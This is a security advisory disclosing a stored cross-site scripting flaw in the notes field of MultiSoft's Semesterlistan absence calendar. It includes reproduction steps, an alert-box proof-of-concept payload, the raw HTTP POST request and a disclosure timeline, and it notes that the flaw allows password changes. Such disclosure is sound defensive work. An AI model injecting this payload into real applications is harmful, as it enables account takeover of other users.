This disclosure does not have a CVE assigned to it as it affects a cloud service.


Semesterlistan (en. AbsenceList) allows users to add a note to their absence periods, but does not properly sanitise this field in the main calendar view. This allows an authenticated low-privilege user to inject arbitrary JavaScript to affect all users (including managers able to approve absence) when they open the application.

Vendor Description

MultiSoft is a Swedish software company that helps businesses save resources to concentrate on creating and adding value with automated and bespoke system solutions.


MultiSoft has remediated this issue; no action is required for cloud users.

Technical Details

Log on as any low-privileged user and opt to add a new absence period such as vacation.

Select today’s date and enter the following payload as the absence note: <img src=a onerror="alert('Cross-Site Scripting at: '+document.domain)">

The following HTTP POST request is sent when the absence is submitted:

POST /api/Period/Create HTTP/1.1

{"Period":{"startDate":"2022-03-29T22:00:00.000Z","endDate":"2022-03-30T21:59:00.000Z","periodNote":"<img src=a onerror=\"alert('Cross-Site Scripting at: '+document.domain)\">","periodTypeId":1,"userId":<REMOVED>,"StartDate":"2022-03-30 00:00:00+02:00","EndDate":"2022-03-30 23:59:00+02:00"}}

Submit the absence request and note how the injected JavaScript triggers when the calendar view is reloaded.

It is notable that the attack vector can be used to change a victim’s password, as the current password is not required.

CVSS v3.1

HIGH, 8.2 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L

Vulnerability Disclosure Timeline

2022-03-30 - Disclosed to vendor
2022-03-31 - Vendor confirms vulnerability stating it is resolved
2022-03-31 - Informs vendor that the issue is still present ( no response )
2022-04-06 - Vendor contacted ( no response )
2022-04-08 - The issue appears to be fixed
2022-04-12 - Vendor confirms fix
2022-08-21 - Public disclosure